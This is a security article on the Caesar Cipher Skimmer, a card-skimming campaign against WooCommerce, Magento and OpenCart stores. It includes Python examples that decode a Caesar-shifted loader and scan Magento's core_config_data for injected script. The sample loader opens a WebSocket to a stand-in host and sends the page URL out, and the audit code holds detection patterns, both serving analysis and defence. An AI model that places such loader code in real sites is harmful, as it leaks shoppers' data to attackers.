
Caesar Cipher Skimmer

Several widely used Content Management Systems (CMS), including Magento, WordPress and OpenCart, have recently been hit by a novel credit card Web skimmer known as the Caesar Cipher Skimmer. The malware is injected into e-commerce websites with the goal of covertly harvesting payment card details entered at checkout.

The campaign specifically targeted the WooCommerce plugin for WordPress, where it modified the 'form-checkout.php' PHP file to capture credit card information. Researchers tracking the campaign note that the injected code has been revised over time to make it less conspicuous.

The Caesar Cipher Skimmer May Be Deployed to Previously Compromised Sites

Specifically, it uses the same letter-substitution mechanism as the Caesar cipher to turn the malicious code into a garbled string and to conceal the external domain that hosts the payload. It is presumed that all affected websites had previously been compromised by other means in order to stage a PHP script named 'style.css' or 'css.php', an apparent attempt to pass as a style sheet and evade detection.

These scripts, in turn, are designed to load a further obfuscated piece of JavaScript that opens a WebSocket to another server and fetches the actual skimmer from it.

The loader sends the URL of the current web page, which allows the attackers to tailor the response to each infected site. Some versions of this second-stage script even check whether it is running for a logged-in WordPress user and modify the response accordingly, so that administrators are less likely to see the skimmer in action.
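The substitution step described above is an ordinary Caesar shift: every letter is moved a fixed number of positions through the alphabet while digits and punctuation stay put, which is enough to hide strings such as `WebSocket` and the payload domain from simple keyword searches. The following is an added example, not the skimmer's own code and not code from the researchers who reported it. It shifts a constructed loader snippet (the domain is a reserved example name, and the shift of 13 is an assumption, since the page does not state the shift the campaign uses) and then recovers both the snippet and the hidden domain the way an analyst would, by trying all 25 shifts and scoring each candidate for loader-like tokens. The brute force generalizes beyond this one sample: it works for any shift and any payload that contains a URL or a few of the listed tokens.

```python
"""Caesar-shift encoding of a loader string and an analyst-side brute force.

Added example (constructed sample, not the skimmer's actual code).
"""
import re
import string

ALPHABET = string.ascii_lowercase

# Tokens a skimmer loader is likely to contain once decoded.
LOADER_TOKENS = ("new WebSocket", "document", "location", "href", "http", "wss")
# Scheme plus host; matches a decoded payload-hosting domain.
DOMAIN_RE = re.compile(r"(?:wss?|https?)://[a-z0-9.-]+\.[a-z]{2,}")


def caesar(text: str, shift: int) -> str:
    """Shift letters by `shift` positions (negative undoes a positive shift).

    Case is preserved; digits, punctuation and whitespace pass through untouched,
    which is why '://' and '.' survive in the garbled string.
    """
    out = []
    for ch in text:
        if ch.islower():
            out.append(ALPHABET[(ALPHABET.index(ch) + shift) % 26])
        elif ch.isupper():
            out.append(ALPHABET[(ALPHABET.index(ch.lower()) + shift) % 26].upper())
        else:
            out.append(ch)
    return "".join(out)


def score(candidate: str) -> int:
    """Heuristic: reward loader tokens and a well-formed scheme://host."""
    points = sum(3 for token in LOADER_TOKENS if token in candidate)
    if DOMAIN_RE.search(candidate):
        points += 5
    return points


def recover(garbled: str) -> tuple:
    """Try every shift and return (shift, decoded) for the best-scoring candidate."""
    best = max(range(26), key=lambda s: score(caesar(garbled, -s)))
    return best, caesar(garbled, -best)


def hidden_domain(garbled: str) -> str:
    """Return the scheme://host concealed in a Caesar-shifted loader, or '' if none."""
    _, decoded = recover(garbled)
    match = DOMAIN_RE.search(decoded)
    return match.group(0) if match else ""


# Constructed loader snippet; 'example.invalid' is a reserved name, not a real C2.
LOADER = ('var ws = new WebSocket("wss://cdn.example.invalid/ws"); '
          'ws.onopen = function(){ ws.send(location.href); };')
SHIFT = 13  # assumption: the shift used by the real campaign is not given on the page
GARBLED = caesar(LOADER, SHIFT)

if __name__ == "__main__":
    print("garbled :", GARBLED)
    shift, decoded = recover(GARBLED)
    print("shift   :", shift)
    print("decoded :", decoded)
    print("domain  :", hidden_domain(GARBLED))
```

The garbled form still contains the `://` and the dots of the domain, so a search for `://` or for a suspicious `.onopen` assignment pattern is a cheap triage step even before decoding; the scoring loop then identifies the shift without any knowledge of the original text.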

The Operators of the Caesar Cipher Skimmer Are Likely Russian

Some versions of the script contain comments written in Russian, indicating that the threat actors behind the operation may be Russian-speaking.

The attack does not rely solely on modifying the 'form-checkout.php' file in WooCommerce; the attackers have also abused the legitimate WPCode plugin to inject the skimmer into the website database.

On Magento-based websites, the JavaScript injections are found in database tables such as core_config_data. The method used against OpenCart sites remains unknown at this time. Because of its widespread adoption as a website platform, WordPress and its extensive plugin ecosystem have become lucrative targets for malicious actors, offering them ample opportunities for attack.
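Because the Magento variant lives in the database rather than on disk, a file-integrity scan will not find it; the check has to run against core_config_data itself. The following is an added example, not code from Magento, WooCommerce or the researchers who reported the campaign. It builds an in-memory SQLite copy of the table with constructed rows (the real table is in MySQL/MariaDB and carries more columns; the config paths, values and 'example.invalid' hostnames are made up for the example) and flags values that contain a remote script tag, a WebSocket loader of the kind described above, or common obfuscation helpers. The first-pass WHERE clause is plain SQL and can be pasted into a MySQL client against a real store.

```python
"""Audit Magento's core_config_data for injected JavaScript.

Added example with constructed rows; not Magento's or Sucuri's tooling.
"""
import re
import sqlite3

# Patterns that legitimate head/footer HTML snippets rarely need.
SUSPICIOUS = [
    ("remote script src",
     re.compile(r"<script[^>]*\ssrc\s*=\s*['\"]?(?:https?:)?//", re.I)),
    ("WebSocket loader",
     re.compile(r"new\s+WebSocket\s*\(", re.I)),
    ("obfuscation helper",
     re.compile(r"\b(?:eval|atob|unescape|String\.fromCharCode)\s*\(", re.I)),
]

# Constructed rows: (path, value). Two are clean, two carry injections,
# and one is an unrelated URL setting that must not be flagged.
SAMPLE_ROWS = [
    ("design/head/includes",
     '<link rel="stylesheet" href="/static/custom.css">'),
    ("design/head/includes",
     '<script>var w=new WebSocket("wss://cdn.example.invalid/ws");'
     'w.onopen=function(){w.send(location.href)};</script>'),
    ("design/footer/absolute_footer",
     '<script src="//static.example.invalid/s.js"></script>'),
    ("design/footer/absolute_footer",
     "<p>Copyright example store</p>"),
    ("web/unsecure/base_url",
     "https://shop.example.invalid/"),
]


def build_db(rows):
    """Create an in-memory stand-in for core_config_data and load the rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE core_config_data ("
        "config_id INTEGER PRIMARY KEY, scope TEXT, scope_id INTEGER, "
        "path TEXT, value TEXT)"
    )
    conn.executemany(
        "INSERT INTO core_config_data (scope, scope_id, path, value) "
        "VALUES ('default', 0, ?, ?)",
        rows,
    )
    return conn


def find_injections(conn):
    """Return a list of {config_id, path, reasons} for rows that look injected.

    The SQL pass narrows to rows containing script or WebSocket text (the same
    WHERE clause works on MySQL); the regex pass then explains each hit.
    """
    cur = conn.execute(
        "SELECT config_id, path, value FROM core_config_data "
        "WHERE value LIKE '%<script%' OR value LIKE '%WebSocket%' "
        "OR value LIKE '%eval(%'"
    )
    hits = []
    for config_id, path, value in cur:
        reasons = [label for label, rx in SUSPICIOUS if rx.search(value)]
        if reasons:
            hits.append({"config_id": config_id, "path": path, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_injections(build_db(SAMPLE_ROWS)):
        print(f"config_id={hit['config_id']} path={hit['path']} "
              f"reasons={', '.join(hit['reasons'])}")
```

Any hit deserves a look at the row's full value and at who last changed it; on a live store the same query should be repeated for store-view and website scopes, since an injection placed at a narrower scope overrides the default one on the affected storefront.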

Website owners should keep their CMS software and plugins up to date, maintain strong password practices, and periodically audit their sites for suspicious administrator accounts and unexpected changes to checkout files and database configuration.

Victims of a Skimmer Could Endure Serious Consequences

Credit card Web skimmers, also known as Magecart attacks or digital skimming, can have severe consequences for both consumers and businesses:

  • Financial Losses: Skimmers harvest credit card details entered on compromised websites. This information is then used for fraudulent transactions, leading to direct financial losses for affected individuals.
  • Identity Theft: Harvested credit card information can be used for identity theft purposes, including opening new accounts or making unauthorized purchases in the victim's name.
  • Damage to Business Reputation: Companies that suffer a skimming attack may face damage to their reputation and loss of customer trust. Consumers may avoid shopping on websites that have experienced security breaches.
  • Regulatory Penalties: Depending on the jurisdiction, businesses may face fines and other penalties for failing to protect customer data adequately. Compliance with data protection regulations such as GDPR or CCPA may also be called into question.
  • Operational Disruption: Mitigating the effects of a skimming attack requires significant resources and time. Businesses may need to temporarily shut down their websites or services to investigate and remediate the breach, leading to operational disruption and financial impact.
  • Long-term Impact on Revenue: Even after mitigating a skimming attack, businesses may experience reduced customer traffic and sales as a result of the breach. Restoring customer confidence and rebuilding a positive reputation can be a long-term challenge.

In summary, credit card Web skimmers pose significant risks to both consumers and businesses, affecting financial stability, trust and regulatory compliance. Preventative measures, such as regular security audits, robust encryption practices and prompt software updates, are essential to mitigate these risks and protect against such attacks.
